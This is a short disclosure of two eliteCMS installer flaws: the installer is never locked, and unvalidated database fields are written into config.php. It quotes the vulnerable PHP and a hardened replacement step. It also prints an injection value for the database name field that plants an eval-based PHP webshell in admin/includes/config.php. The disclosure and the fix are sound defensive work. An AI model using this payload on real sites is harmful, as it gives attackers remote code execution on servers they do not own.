eliteCMS's installer is not locked after installation finishes, so an attacker can re-run the installation simply by visiting the installer URL.
A second vulnerability is that the installer can be made to write a one-line webshell straight into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
    ...

Now look at the code again:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the POSTed database name is:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written to /admin/includes/config.php.
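As an added example (not eliteCMS's own code), here is how step 4 of the installer could be hardened against both issues above: it refuses to run once an install lock exists, validates the POSTed database settings against strict patterns, and serializes them with var_export() so a value can never break out of the generated config file. The lock-file and config paths are assumptions.

```php
<?php
// Hardened installer step 4 (added example, not eliteCMS code).
// Assumptions: INSTALL_LOCK and CONFIG_FILE paths are hypothetical.

define('INSTALL_LOCK', __DIR__ . '/install.lock');
define('CONFIG_FILE', __DIR__ . '/../admin/includes/config.php');

// 1. Refuse to run at all once installation has completed.
if (file_exists(INSTALL_LOCK)) {
    http_response_code(403);
    exit('Installer is locked. Remove install.lock to reinstall.');
}

// 2. Validate each DB setting before it reaches the session or the config file.
function validateDbSetting(string $key, string $value): string {
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9._:-]{1,255}\z/',  // host or host:port
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}\z/',       // MySQL identifier chars only
        'DB_USER'   => '/^[A-Za-z0-9_.-]{1,32}\z/',
        'DB_PASS'   => '/^[^\x00-\x1f\x7f]{0,128}\z/', // printable, no control chars
    ];
    if (!isset($rules[$key]) || !preg_match($rules[$key], $value)) {
        throw new InvalidArgumentException("Invalid value for $key");
    }
    return $value;
}

$settings = [];
foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
    $settings[$key] = validateDbSetting($key, (string)($_POST[$key] ?? ''));
}

// 3. Emit each value through var_export() so quotes, backslashes and "?>" in
//    the value become part of a PHP string literal instead of new code.
$write = "<?php\n";
foreach ($settings as $key => $value) {
    $write .= sprintf("define(%s, %s);\n", var_export($key, true), var_export($value, true));
}
// Deliberately no closing "?>" tag, so nothing can follow the defines.

// 4. Write the file with an exclusive lock, then lock the installer.
if (file_put_contents(CONFIG_FILE, $write, LOCK_EX) === false) {
    exit('Could not write config file');
}
touch(INSTALL_LOCK);
```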